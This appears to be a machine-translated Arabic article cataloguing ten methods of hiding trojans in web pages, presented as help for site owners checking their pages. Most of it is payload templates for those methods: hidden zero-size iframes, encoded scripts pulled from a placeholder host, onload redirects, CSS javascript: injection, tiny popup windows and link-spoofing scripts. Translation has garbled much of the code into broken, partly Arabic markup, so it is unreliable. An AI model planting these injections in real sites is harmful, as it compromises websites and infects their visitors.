تخبرك هذه المقالة بالطرق التي يستخدمها الأشرار غالبًا لتعليق أحصنة طروادة على صفحات الويب، بحيث يمكنك منع صفحات الويب الخاصة بك طالما اكتشفت هذه الأماكن التي تُستخدم غالبًا لتعليق أحصنة طروادة، فمن السهل العثور على الموقع من أحصنة طروادة.
1: إطار معلق للحصان
<iframe src=عرض العنوان=0 الارتفاع=0></iframe>
يمكنك إدخال روابط مواقع ويب ضارة على العنوان، وما إلى ذلك.
الثاني: تركيب ملف js
طالما أنه ملف JS، فمن الممكن تعديله بشكل ضار وبالتالي ربطه بتعليمات برمجية ضارة. بشكل عام، من المرجح أن يكون رمز JS الذي يشير إليه الموقع بأكمله مرتبطًا بأحصنة طروادة، ويمكننا إلقاء نظرة عليه يسار أو أسفل رمز JS. يحب الأشرار الجمع بين التعليمات البرمجية الضارة والرموز العادية المخفية مع الكثير من المسافات أو أحرف الإرجاع، لذا يجب عليك التحقق لمعرفة ما إذا كانت صفحة رموز JS قد تم توسيعها عمدًا.
ثلاثة: تشفير تشوه JS
<لغة البرنامج النصي=JScript.Encode src=http://www.xxx.com/muma.txt></script>
يمكن تغيير muma.txt إلى أي لاحقة
الرابع: جسم الحصان المعلق
<body onload=window.location='address';></body>
الخامسة: تعليقة الحصان المخفية
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src=http://www.xxx.com/muma.htm/></iframe>';
ستة: الحصان المعلق في CSS
جسم {
صورة الخلفية: url('javascript:document.write(<script src=http://www.XXX.net/muma.js></script>)')}
هذه الطريقة أكثر قسوة ويصعب اكتشافها.
سبعة: حصان جاجا المعلق
<لغة البرنامج النصي=جافا سكريبت>
window.open (address,,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1);
</script>
الثامن: تمويه الصورة
<أتش تي أم أل>
<iframe src=الارتفاع=0 العرض=0></iframe>
<img src=عنوان الصورة></center>
</html>
التاسع: الدعوة المقنعة
<صفوف مجموعة الإطارات=444,0 عمود=*>
<frame src=فتح إطار صفحة الويب=بدون تمرير=تصغير حجم هامش العرض تلقائيًا=0margingheight=0>
<frame src=网马地址frameborder=لا يوجد تمرير=لا يوجد حجم هامشيعرض=0margingheight=0>
</مجموعة الإطارات>
العاشر: الخداع المتقدم
<a href=http://www.163.com (يخلط بين عنوان الاتصال ويظهر أن هذا العنوان يشير إلى عنوان حصان طروادة) onMouseOver=www_163_com(); return true;> المحتوى الذي سيتم عرضه على الصفحة</a>
<لغة البرنامج النصي=جافا سكريبت>
الدالة www_163_com ()
{
var url=net عنوان الحصان؛
open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10, أعلى = 10)؛
}
</النص>